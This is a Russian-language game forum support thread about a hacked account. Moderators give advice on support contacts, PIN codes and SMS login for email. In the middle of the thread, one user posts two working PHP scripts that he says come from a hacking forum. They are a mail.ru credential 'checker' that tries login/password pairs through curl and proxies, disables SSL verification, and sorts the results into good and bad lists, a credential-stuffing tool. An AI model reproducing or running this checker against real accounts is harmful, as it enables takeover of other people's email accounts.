Поддержка Взломали акк

Тема в разделе "Центр поддержки (User support center)", создана пользователем HeavenLight, 19 июн 2015.

Статус темы:
Закрыта.
  1. HeavenLight

    HeavenLight Забанен

    Регистрация:
    5 апр 2015
    Сообщения:
    29
    Симпатии:
    6
    Баллы:
    3
    Суть вопроса,правильно,что я написал Yukio и keiichi о данной проблеме в пм на форуме,или надо кому-то(куда-то) еще писать,чтобы решить этот вопрос?
     
  2. MetallAngel

    MetallAngel Команда форума Модератор

    Регистрация:
    3 сен 2013
    Сообщения:
    9.558
    Симпатии:
    3.218
    Баллы:
    113
    Пол:
    Мужской
    godworld_support скайп пишите.
     
  3. ChaosPaladin

    ChaosPaladin Форумный боец Тестер Супер Герой

    Регистрация:
    21 окт 2012
    Сообщения:
    2.424
    Симпатии:
    585
    Баллы:
    113
    Пол:
    Мужской
    Адрес:
    Minsk
    Skype:
    ChaosPaladin123
    Ну взломали и что? Насколько я знаю, то систему ПИН код персонажа никак не обойти (на нее кейлогер не должен работать, т.к цифры при каждом новом входе на аккаунт меняют свое местоположение), т.е злоумышленник никак не сможет зайти дальше лобби. Значит давали кому-то аккаунт из близких, знакомых или домашних питомцев.
     
    Yukio, Forb1dden, ДнищеДна и ещё 1-му нравится это.
  4. magnum888

    magnum888 Герой

    Регистрация:
    25 мар 2015
    Сообщения:
    820
    Симпатии:
    94
    Баллы:
    28
    Адрес:
    Россия, г. Краснодар
    Сайт:
    Ник в игре:
    Excelsior, Антейку
    Skype:
    devagleo
    Может мастер акк взломали...
     
  5. MetallAngel

    MetallAngel Команда форума Модератор

    Регистрация:
    3 сен 2013
    Сообщения:
    9.558
    Симпатии:
    3.218
    Баллы:
    113
    Пол:
    Мужской
    без доступа к мылу толку 0, там сейчас смена пароля\снятие игрового паса на чара только через подтверждение.
     
  6. Forb1dden

    Forb1dden GGWP Супер Герой

    Регистрация:
    10 апр 2014
    Сообщения:
    3.452
    Симпатии:
    227
    Баллы:
    63
    Род занятий:
    порноактёр
    Адрес:
    Интернеты ваши
    Ник в игре:
    Forb1dden
    значит кто-то умеет брутить и работать с curl
     
  7. Forb1dden

    Forb1dden GGWP Супер Герой

    Регистрация:
    10 апр 2014
    Сообщения:
    3.452
    Симпатии:
    227
    Баллы:
    63
    Род занятий:
    порноактёр
    Адрес:
    Интернеты ваши
    Ник в игре:
    Forb1dden
    как уже написал, без определенных знаний толку в этом мало, да и если это имущество где-то продается то сто процентов где-то на ммору
    мы по твоему желанию можем пойти, где я покажу примерно как делается, а ты может придумаешь как можно защиту доработать... ато реально как-то стремно бывает)
    ну хотя скорее всего как в 90% случаев, школьники не знающие о том что можно высмотреть в логах, пытаются нажиться.

    я тут исходник с юхака стырил, по этой теме... это чекер всего мыловского, по той же схеме можно и с почтой сделать.

    PHP:
    $url 'https://auth.mail.ru/'// URL ñàéòà íà êîòîðîì áóäåì àâòîðèçîâàòüñÿ
    $urlTo 'http://my.mail.ru/cgi-bin/login?site_id=1_1000006_1000198_0&page=http%3a%2f%2fmy.mail.ru%2fapps%2f552078%3fref%3dpromo%26anchor%3d&autoauth=1'// URL íà êîòîðîé áóäåì ñëàòü POST äàííûå
    $email c("edit1")->text;
    $login c("edit4")->text// Âàø ëîãèí
    $passw c("edit5")->text// Âàø ïàðîëü
    $post "page=&post=&login_from=&lang=&setLang=&Login=$login&Domain=$email&Password=$passw&saveauth=1&new_auth_form=1"// POST äàííûå
    $proxy c("listBox2")->items->count-1;
    $proxy2 c("listBox2")->items->lines[$proxy];
    $memo c("memo2")->text;
    $email c("edit1")->text;
    $pass1 c("edit4")->text;
    $pass c("edit5")->text;
    $times c("label9")->caption;
    $dates c("label10")->caption;
    c("memo1")->text .= "[$times - $dates]Checking account... \n";
    $ch curl_init(); // ??íèöèàëèçèðóåì ñåàíñ CURL
    curl_setopt($chCURLOPT_SSL_VERIFYPEER0);
    curl_setopt($chCURLOPT_SSL_VERIFYHOST0);
    curl_setopt($chCURLOPT_URL$url); // Çàõîäèì íà ñàéò
    curl_setopt($chCURLOPT_RETURNTRANSFERtrue); // Äåëàåì òàê, ÷òîáû ñòðàíèöà íå âûäàâàëàñü ñðàçó â ïîòîê, à ìîæíî áûëî åå çàïèñàòü â ïåðåìåííóþ
    $html curl_exec($ch); // ??ìèòèðóåì çàõîä íà ñàéò
    curl_setopt($chCURLOPT_URL$urlTo); // Óñòàíàâëèâàåì àäðåñ êóäà áóäåì ñëàòü POST äàííûå
    curl_setopt($chCURLOPT_COOKIEJAR"cookie.txt"); // Çàïèñûâàåì cookies â ôàéë, ÷òîáû ïîòîì ìîæíî áûëî èõ ñ÷èòàòü
    curl_setopt($chCURLOPT_COOKIEFILE"cookie.txt"); // Òåïåðü ÷èòàåì cookies ñ ôàéëà
    curl_setopt($chCURLOPT_POSTtrue); // Ãîâîðèì, ÷òî èíôîðìàöèÿ áóäåò îòïðàâëÿòüñÿ ìåòîäîì POST
    curl_setopt($chCURLOPT_TIMEOUT60);
    curl_setopt($chCURLOPT_POSTFIELDS$post); // Ïåðåäàåì POST äàííûå
    curl_setopt($chCURLOPT_PROXYTYPE,CURLPROXY_HTTP);
    curl_setopt($chCURLOPT_PROXY"$proxy2");
    curl_setopt($chCURLOPT_FOLLOWLOCATIONtrue); // ??íîãäà áûâàåò, ÷òî ïîñëå îòïðàâêè äàííûõ ïðîèñõîäèò ðåäèðåêò heaer('Location:...').
    // Ýòîò ïàðàìåòð ãîâîðèò î òî, ÷òîáû ìû ñëåäîâàëè çà íèìè, à íå îñòàâàëèñü íà ìåñòå ïîñëå îòïðàâêè äàííûõ

    $html curl_exec($ch); // Çàïèñûâàåì ïðèøåäøèå äàííûå â ïåðåìåííóþ
    curl_close($ch); // Çàêðûâàåì ñåàíñ ðàáîòû CURL
     // ?? âóàëÿ  Âûâîäèì àâòîðèçîâàííóþ ñòðàíèöó

    c("memo2")->text $html;
    $text 'l-loginform-row_label_lostpass';
    if(
    preg_match("/$text/"$memo)){
    c("label5")->caption +=1;
    c("edit3")->text "Status: +1 bad...";
    $times c("label9")->caption;
    c("label8")->caption +=1;
    $dates c("label10")->caption;
    c("memo1")->text .= "[$times - $dates]+1 Bad \n";
    $fh fopen('bad.txt'"a+");
    fwrite($fh"$pass1@$email;$pass"._BR_);
    fclose($fh);
    c("label8")->caption +=1;
    }
    else{
    c("label3")->caption +=1;
    c("edit3")->text "Status: +1 good...";
    $times c("label9")->caption;
    $dates c("label10")->caption;
    c("memo1")->text .= "[$times - $dates]+1 good \n";
    $fh fopen('good.txt'"a+");
    fwrite($fh"$pass1@$email;$pass"._BR_);
    fclose($fh);
    }
    или вот, конкретно случай с почтой:
    PHP:
    $url 'https://auth.mail.ru/'// URL ñàéòà íà êîòîðîì áóäåì àâòîðèçîâàòüñÿ

    $urlTo 'https://auth.mail.ru/cgi-bin/auth'// URL íà êîòîðîé áóäåì ñëàòü POST äàííûå

    $email c("edit1")->text;

    $login c("edit4")->text// Âàø ëîãèí

    $passw c("edit5")->text// Âàø ïàðîëü

    $post "page=&post=&login_from=&lang=&setLang=&Login=$login&Domain=$email&Password=$passw&saveauth=1&new_auth_form=1"// POST äàííûå

    $ch curl_init(); // ??íèöèàëèçèðóåì ñåàíñ CURL

    curl_setopt($chCURLOPT_SSL_VERIFYPEER0);

    curl_setopt($chCURLOPT_SSL_VERIFYHOST0);

    curl_setopt($chCURLOPT_URL$url); // Çàõîäèì íà ñàéò

    curl_setopt($chCURLOPT_RETURNTRANSFERtrue); // Äåëàåì òàê, ÷òîáû ñòðàíèöà íå âûäàâàëàñü ñðàçó â ïîòîê, à ìîæíî áûëî åå çàïèñàòü â ïåðåìåííóþ

    $html curl_exec($ch); // ??ìèòèðóåì çàõîä íà ñàéò

    curl_setopt($chCURLOPT_URL$urlTo); // Óñòàíàâëèâàåì àäðåñ êóäà áóäåì ñëàòü POST äàííûå

    curl_setopt($chCURLOPT_COOKIEJAR'cookie.txt'); // Çàïèñûâàåì cookies â ôàéë, ÷òîáû ïîòîì ìîæíî áûëî èõ ñ÷èòàòü

    curl_setopt($chCURLOPT_COOKIEFILE'cookie.txt'); // Òåïåðü ÷èòàåì cookies ñ ôàéëà

    curl_setopt($chCURLOPT_POSTtrue); // Ãîâîðèì, ÷òî èíôîðìàöèÿ áóäåò îòïðàâëÿòüñÿ ìåòîäîì POST

    curl_setopt($chCURLOPT_POSTFIELDS$post); // Ïåðåäàåì POST äàííûå

    curl_setopt($chCURLOPT_FOLLOWLOCATIONtrue); // ??íîãäà áûâàåò, ÷òî ïîñëå îòïðàâêè äàííûõ ïðîèñõîäèò ðåäèðåêò heaer('Location:...').

    $html curl_exec($ch); // Çàïèñûâàåì ïðèøåäøèå äàííûå â ïåðåìåííóþ

    curl_close($ch); // Çàêðûâàåì ñåàíñ ðàáîòû CURL

    c("memo2")->text $html;
     
    magnum888 нравится это.
  8. Bacek

    Bacek Команда форума Администратор

    Регистрация:
    12 июл 2012
    Сообщения:
    8.912
    Симпатии:
    6.194
    Баллы:
    113
    смс вход в почту решает проблему брута / перебора / входа друзей
     
    ДнищеДна, Forb1dden, Yukio и 2 другим нравится это.
  9. Yukio

    Yukio Команда форума Администратор

    Регистрация:
    2 июл 2012
    Сообщения:
    2.992
    Симпатии:
    1.054
    Баллы:
    113
    На данный момент по защите мы сделали все, что могли, остальное уже зависит от пользователей.
    Взломать практически не реально, если поставить SMS-вход на почту (как сказал выше Bacek).
    Тему закрываю, по проблеме - в саппорт.
     
    Forb1dden нравится это.
Статус темы:
Закрыта.

Поделиться этой страницей